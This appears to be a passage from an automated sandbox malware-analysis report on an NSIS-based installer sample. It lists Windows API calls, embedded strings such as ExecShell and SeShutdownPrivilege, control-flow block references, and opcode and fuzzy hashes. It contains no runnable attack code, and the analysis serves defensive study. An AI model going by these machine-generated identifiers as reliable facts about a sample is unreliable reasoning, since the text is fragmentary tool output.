                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                  • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                  • API String ID: 2435955865-239407132
                                                                                  • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                  • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                  • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                  • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                                  Control-flow Graph (image not preserved; legend: Executed / Not Executed; starts at block 4074bb-4074c0)
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                  • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                  • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                  • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                  • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                  Similarity
                                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                                  • String ID:
                                                                                  • API String ID: 310444273-0
                                                                                  • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                  • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                  • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                  • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                  • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileFirst
                                                                                  • String ID:
                                                                                  • API String ID: 2295610775-0
                                                                                  • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                  • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                  • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                  • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                                  Control-flow Graph (image not preserved; legend: Executed / Not Executed; starts at block 4015a0-4015f4)
                                                                                  APIs
                                                                                  • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                  • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                  • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                  • ShowWindow.USER32(?), ref: 00401753
                                                                                  • ShowWindow.USER32(?), ref: 00401767
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                  • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                  • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                  Strings
                                                                                  • Rename on reboot: %s, xrefs: 00401943
                                                                                  • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                  • Rename failed: %s, xrefs: 0040194B
                                                                                  • Rename: %s, xrefs: 004018F8
                                                                                  • detailprint: %s, xrefs: 00401679
                                                                                  • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                  • Sleep(%d), xrefs: 0040169D
                                                                                  • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                  • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                  • BringToFront, xrefs: 004016BD
                                                                                  • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                  • SetFileAttributes failed., xrefs: 004017A1
                                                                                  • Aborting: "%s", xrefs: 0040161D
                                                                                  • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                  • Jump: %d, xrefs: 00401602
                                                                                  • Call: %d, xrefs: 0040165A
                                                                                  • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                  Similarity
                                                                                  • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                  • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s

                                                                                  Control-flow Graph (first block 40592c-405944; graph rendering not reproduced)
                                                                                  APIs
                                                                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                  • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                                                                                  • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                  • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                  • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                  • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                  • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                    • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                  • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                  • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                  • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb

                                                                                  APIs
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                                                                  • CompareFileTime.KERNEL32(-00000014,?,FeesPhpbb,FeesPhpbb,00000000,00000000,FeesPhpbb,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                  • String ID: FeesPhpbb$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"

                                                                                  Control-flow Graph (first block 403587-4035d5; graph rendering not reproduced)
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 00403598
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                  Strings
                                                                                  • Inst, xrefs: 0040366C
                                                                                  • Error launching installer, xrefs: 004035D7
                                                                                  • soft, xrefs: 00403675
                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                  • Null, xrefs: 0040367E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                                                                  Control-flow Graph (first block 40337f-403396; graph rendering not reproduced)
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 004033E7
                                                                                  • GetTickCount.KERNEL32 ref: 00403464
                                                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                  • wsprintfW.USER32 ref: 004034A4
                                                                                  • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                  • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: CountFileTickWrite$wsprintf
                                                                                  • String ID: ... %d%%$P1B$X1C$X1C

                                                                                  Control-flow Graph (first block 401eb9-401ec4; graph rendering not reproduced)
                                                                                  APIs
                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                  • GlobalFree.KERNELBASE(007BA1F0), ref: 00402387
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: FreeGloballstrcpyn
                                                                                  • String ID: Exch: stack < %d elements$FeesPhpbb$Pop: stack empty

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 592 4022fd-402325 call 40145c GetFileVersionInfoSizeW 595 4030e3-4030f2 592->595 596 40232b-402339 GlobalAlloc 592->596 596->595 597 40233f-40234e GetFileVersionInfoW 596->597 599 402350-402367 VerQueryValueW 597->599 600 402384-40238d GlobalFree 597->600 599->600 603 402369-402381 call 405f51 * 2 599->603 600->595 603->600
                                                                                  APIs
                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                  • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                  • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                  • GlobalFree.KERNELBASE(007BA1F0), ref: 00402387
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3376005127-0
                                                                                  • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                                  • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                  • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                                  • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                  • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                  • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2568930968-0
                                                                                  • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                                  • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                  • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                                  • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 625 402713-40273b call 406009 * 2 630 402746-402749 625->630 631 40273d-402743 call 40145c 625->631 633 402755-402758 630->633 634 40274b-402752 call 40145c 630->634 631->630 635 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 633->635 636 40275a-402761 call 40145c 633->636 634->633 636->635
                                                                                  APIs
                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringWritelstrcpyn
                                                                                  • String ID: <RM>$FeesPhpbb$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                  • API String ID: 247603264-831220234
                                                                                  • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                  • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                  • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                  • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 732 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 743 402223-4030f2 call 4062a3 732->743 744 40220d-40221b call 4062a3 732->744 744->743
                                                                                  APIs
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  Strings
                                                                                  • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                  • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                  • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                  • API String ID: 3156913733-2180253247
                                                                                  • Opcode ID: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                                                  • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                  • Opcode Fuzzy Hash: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                                                  • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 752 405e7f-405e8b 753 405e8c-405ec0 GetTickCount GetTempFileNameW 752->753 754 405ec2-405ec4 753->754 755 405ecf-405ed1 753->755 754->753 757 405ec6 754->757 756 405ec9-405ecc 755->756 757->756
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountFileNameTempTick
                                                                                  • String ID: nsa
                                                                                  • API String ID: 1716503409-2209301699
                                                                                  • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                  • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                  • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                  • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                  • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                  • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                  • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
